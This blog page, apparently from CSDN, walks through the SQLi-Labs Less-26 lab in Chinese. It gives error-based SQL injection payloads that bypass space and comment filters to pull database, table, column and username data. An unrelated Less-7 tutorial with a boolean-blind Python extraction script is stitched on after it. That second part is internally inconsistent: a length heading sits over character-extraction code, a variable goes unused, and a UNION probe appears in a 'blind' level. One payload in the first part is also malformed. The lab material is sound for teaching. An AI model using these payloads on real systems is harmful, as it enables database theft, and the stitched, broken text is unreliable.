sqli-less-26-less26a

本文探讨了在特定过滤条件下,如何运用SQL注入技巧获取数据库信息。通过使用updatexml()函数和||运算符,结合特殊字符绕过,演示了数据库名、表名、字段名及数据的提取方法。

less-26 单引号 GET型

这关就有点过滤的意思了,过滤了上一关的东西,并且把空格和%23给过滤了。如果是ubuntu的话,可以用/**/,%0a等绕过,方便一些。但我的是windows,所以就只能用()了。让后使用||来代替and,用‘1来闭合。
数据库:

-1’ || updatexml(1,concat(0x7e,(database()),0x7e),1)||'1

表:

1’||updatexml(1,concat(0x7e(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema)=database()),0x7e),1)||'1

字段:

-1’ ||updatexml(1,concat(0x7e,(select (group_concat(column_name)) from (inFoorrmation_schema.columns) where
(table_name)=‘users’%26%26(table_schema=database())),0x7e),1) || '1
注:%26的url码代表的是&

数据:这里有一个知识点,因为要绕过空格,所以limit 就不能用了,但是updatexml()只能爆32位,如果要爆的数据过多,就没有办法了。所以我们这里再使用一个在盲注中用过的函数 substr(),用法我就不讲了,基本用法应该都知道了。

从第一位到第32位: -1’ ||updatexml(1,substr(concat(0x7e,(select (group_concat(username)) from (users)),0x7e),1,32),1)||'1

从33位到64位:-1’ ||updatexml(1,substr(concat(0x7e,(select (group_concat(username)) from (users)),0x7e),33,64),1)||'1

### SQLi-7 教程与解决方案 #### 背景介绍 SQL注入是一种常见的攻击方式,通过向应用程序输入恶意的SQL语句来操纵数据库查询。SQLi-Labs 是一个用于练习和学习SQL注入技术的平台。 #### Less-7 特点分析 Less-7 主要关注基于布尔盲注(Boolean-based Blind Injection)的技术[^1]。这种类型的注入不依赖于错误消息返回具体的信息,而是利用条件判断来推断数据的存在与否。 #### 实验环境搭建 为了进行实验,确保已经安装并配置好了PHP服务器以及MySQL数据库,并且成功部署了SQLi-Labs项目文件夹下的`/sqli/Less-7/`目录中的脚本[^2]。 #### 测试用例准备 访问目标URL `http://localhost/sqli-labs/Less-7/?id=` 并尝试不同的参数值来进行测试。对于布尔盲注来说,通常会构造一些能够引起不同页面响应的行为模式作为基础: - 正常情况:当ID存在时显示正常的内容; - 错误情况:如果不存在对应的记录,则可能给出空白页或其他提示信息; #### 注入点发现 在Less-7中,`id` 参数是一个潜在的注入点。可以先验证是否存在SQL注入漏洞,比如发送请求 `http://localhost/sqli-labs/Less-7/?id=1' AND '1'='1` 和 `http://localhost/sqli-labs/Less-7/?id=1' AND '1'='2` 来观察是否有区别性的反应。 #### 数据库版本探测实例 一旦确认了注入的可能性之后,就可以进一步探索更多细节。例如获取当前使用的 MySQL 版本号可以通过如下方法实现: ```sql http://localhost/sqli-labs/Less-7/?id=-1 UNION SELECT @@version -- ``` 此命令将会把 `-1` 替换成实际存在的 ID 值加上联合选择操作符 (`UNION`) ,从而执行第二个查询并将结果集附加到原始查询的结果集中展示出来。 #### 字符串长度枚举技巧 假设想要知道管理员用户名的具体字符数,那么可以根据ASCII码表逐位猜测直到找到匹配为止。下面是一段Python代码片段用来自动化这个过程: ```python import requests url = "http://localhost/sqli-labs/Less-7/" payload_true = "?id=1' AND ASCII(SUBSTRING((SELECT user FROM users LIMIT 0,1),{},1))={}--" payload_false = "?id=1' AND ASCII(SUBSTRING((SELECT user FROM users LIMIT 0,1),{},1))!={}--" for i in range(1, 20): for j in range(32, 128): r = requests.get(url + payload_true.format(i,j)) if "You are in" in r.text: print(chr(j), end='') break print() ``` 这段程序将依次遍历每一个位置上的字母直至整个字符串被还原完毕。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值